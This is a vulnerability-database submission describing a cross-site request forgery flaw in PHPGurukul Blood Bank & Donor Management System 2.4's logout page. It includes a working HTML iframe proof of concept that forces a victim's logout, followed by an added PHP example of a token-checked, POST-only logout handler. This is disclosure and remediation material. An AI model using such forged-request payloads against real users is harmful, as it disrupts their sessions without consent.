| Title | https://phpgurukul.com/ Blood Bank & Donor Management System v2.4 CSRF Improper Input Validation |
|---|---|
| Description | There is no CSRF token, allowing an attacker to trigger any activity, including logout. The attacker can embed an iframe that has the logout URL and send it to the victim. If the victim clicks on the link, he will automatically get logged out. (Proof-of-concept HTML reproduced below the table.) |
| User | Lo1x (UID 79468) |
| Submission | 25/12/2024 16:23 (1 year ago) |
| Moderation | 25/12/2024 19:24 (3 hours later) |
| Status | Accepted |
| VulDB entry | 289318 [PHPGurukul Blood Bank & Donor Management System 2.4 /logout.php cross site request forgery] |
| Points | 17 |

Proof of concept as given in the submission description:

```html
<html>
<body>
<iframe
src="http://localhost/bbdms/logout.php"
style="border:0px #FFFFFF none;"
name="myLogoutFrame"
scrolling="no"
frameborder="1"
marginheight="0px"
marginwidth="0px"
height="400px"
width="600px"
allowfullscreen>
</iframe>
</body>
</html>
```
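As an added example, not part of the submission or of the PHPGurukul code base: a logout handler that only acts on a POST request carrying a session-bound CSRF token, so a cross-site `<iframe src="logout.php">` (which can only issue a GET without the token) no longer ends the victim's session. The function names and the `csrf_token` session key are assumptions.

```php
<?php
// Added example of a CSRF-resistant logout.php (not the project's own code).
// csrf_token(), csrf_request_is_valid() and $_SESSION['csrf_token'] are assumed names.
session_start();

// One random token per session; it is embedded in the logout form below.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Accept only a POST whose token matches the session token (constant-time compare).
function csrf_request_is_valid(array $server, array $post, array $session): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false; // an <iframe src=...> load is a plain GET and is rejected here
    }
    $sent     = (string) ($post['csrf_token'] ?? '');
    $expected = (string) ($session['csrf_token'] ?? '');
    return $sent !== '' && $expected !== '' && hash_equals($expected, $sent);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_request_is_valid($_SERVER, $_POST, $_SESSION)) {
        http_response_code(403);
        exit('Invalid request');
    }
    // Only a validated request destroys the session and its cookie.
    $_SESSION = [];
    if (ini_get('session.use_cookies')) {
        $p = session_get_cookie_params();
        setcookie(session_name(), '', time() - 42000,
                  $p['path'], $p['domain'], $p['secure'], $p['httponly']);
    }
    session_destroy();
    header('Location: index.php');
    exit;
}
?>
<!-- The logout link becomes a form that carries the token. -->
<form method="post" action="logout.php">
    <input type="hidden" name="csrf_token"
           value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
    <button type="submit">Logout</button>
</form>
```

Setting the session cookie with `SameSite=Lax` (via `session.cookie_samesite`) adds a second layer, since browsers then omit the cookie on cross-site iframe loads.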